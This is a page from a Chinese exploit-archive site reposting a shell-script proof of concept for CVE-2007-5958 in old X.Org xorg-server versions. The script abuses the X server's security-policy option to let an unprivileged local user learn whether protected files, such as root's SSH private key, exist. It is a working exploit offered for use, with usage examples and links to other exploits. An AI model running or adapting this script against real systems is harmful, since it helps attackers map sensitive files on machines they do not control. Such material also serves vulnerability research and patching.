首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 X.Org xorg-server <= 1.1.1-48.13 Probe for Files Exploit PoC 来源：www.vfocus.net 作者：vl4dZ 发布时间：2008-02-20   #!/bin/sh # Xorg file disclosure vulnerability (CVE-2007-5958) # # Lame xploit by vl4dZ :)) # # sh-3.1$ whoami # uid=1001(kecos) gid=1001(user) groups=1001(user) # sh-3.1$ ./Xorg-File-Existence-PoC.sh /root/.ssh/id_dsa # ... # *** FILE /root/.ssh/id_dsa EXIST !! *** # Vulnerable: xorg-server <= 1.1.1-48.13 X_EXEC=/usr/bin/X TMP_FILE=/tmp/X.$$ if [ "$1" = "" ]; then    echo "usage: $0 <file>"    exit 1 fi [ -f ${X_EXEC} ] || (echo "${X_EXEC} not found"; exit 1) echo -e "\n** Xorg file disclosure vulnerability PoC (CVE-2007-5958) **\n" echo "A second X server is going to be started, once started, type the " echo "ctrl+Alt+Backspace sequence and you'll see the result of your request." echo -en "\nType [Enter] to start: "; read LANG=c ${X_EXEC} :1 -ac -sp $1 2> ${TMP_FILE} grep "error opening security policy file" ${TMP_FILE} >/dev/null if [ $? != 0 ]; then    echo "*** FILE $1 EXIST !! ***" else    echo "*** FILE $1 DOES NOT EXIST !! ***" fi rm -f ${TMP_FILE} echo -e "\nCtrl-C to quit." sleep 500   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apple iPhoto 4.0.3 DPAP Server ·Ourgame GLWorld 2.x hgs_startN ·sCssBoard (pwnpack) Multiple V ·Linux Kernel 2.6.17 - 2.6.24.1 ·DESlock+ <= 3.2.6 DLMFDISK.sys ·Woltlab Burning Board 3.0.x Re ·DESlock+ <= 3.2.6 local kernel ·PunBB <= 1.2.16 Blind Password ·DESlock+ <= 3.2.6 DLMFENC.sys ·X.Org xorg-x11-xfs <= 1.0.2-3. ·Simple CMS <= 1.0.3 (indexen.p ·MyServer 0.8.11 (204 No Conten   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved